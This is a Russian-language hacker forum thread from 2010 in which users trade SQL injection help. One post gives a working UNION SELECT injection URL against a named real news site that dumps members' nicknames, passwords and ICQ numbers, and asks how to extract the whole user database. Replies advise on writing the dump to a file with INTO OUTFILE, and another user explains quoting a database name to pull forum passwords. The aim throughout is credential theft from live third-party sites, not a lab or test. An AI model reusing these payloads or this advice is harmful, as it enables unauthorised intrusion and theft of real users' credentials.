12.03.2010, 17:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Jerri
Есть запрос -
Код:
... GROUP BY f.id ORDER BY [сюда можем впихнуть что хотим] LIMIT 0, 15
Можно ли провести sql-inj , и как? 
_http://www.securitylab.ru/contest/212101.php
|
|
|
12.03.2010, 21:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)
|
|
|
|
12.03.2010, 22:08
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Pashkela
посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)
да там одна лишняя фигурная 
но всеравно странички которые написал вместо xxx.htm неоткрываются вместо них просто пустое место....
PHP код:
case 'page1':
include("xxx.htm");
break;
case 'page2':
include("xxxx.htm");
break;
|
|
|
|
12.03.2010, 22:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
в самое начало скрипта вставь
@ini_set("display_errors","1");
и вообще для кодинга есть другой раздел
|
|
|
|
12.03.2010, 22:23
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Pashkela
и вообще для кодинга есть другой раздел
Полностью согласен. Остальной оффтоп потру.
PS Ну вот видишь, по некоторым вопросам и у нас может быть единство взглядов.
|
|
|
|
13.03.2010, 15:27
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Вот есть инъекция:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,NickName,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,12+from+fusers+--+
При таком вводе отображаются ники и пассы юзеров. Хочу спросить это отображаются все юзеры? При вводе LIMIT вообще ничего нет.
И как слить базу этих пользователей? |
|
|
|
13.03.2010, 15:49
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
есть скуля. хочу вытянуть пароли от форума, но имя бд где лежат пассы содержит -. когда делаю запрос from db-forum.forum_user,то выдает синтаксическую ошибку( можно всё таки как-то вытащить пассы?
UPD: решил, `db-forum`.forum_user
Последний раз редактировалось .:[melkiy]:.; 13.03.2010 в 15:58..
|
|
|
|
13.03.2010, 16:07
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
|
|
|
|
13.03.2010, 16:24
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от CyberHunter
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
нет прав или не туда льешь.
|
|
|
|
13.03.2010, 16:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от CyberHunter
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+
Что не так? Выдает ошибку. Надо все записать в файл.
При INTO OUTFILE надо использовать полный путь.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1974641){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1977309){kind=avatar}
Похожие темы
Комбинированный вид
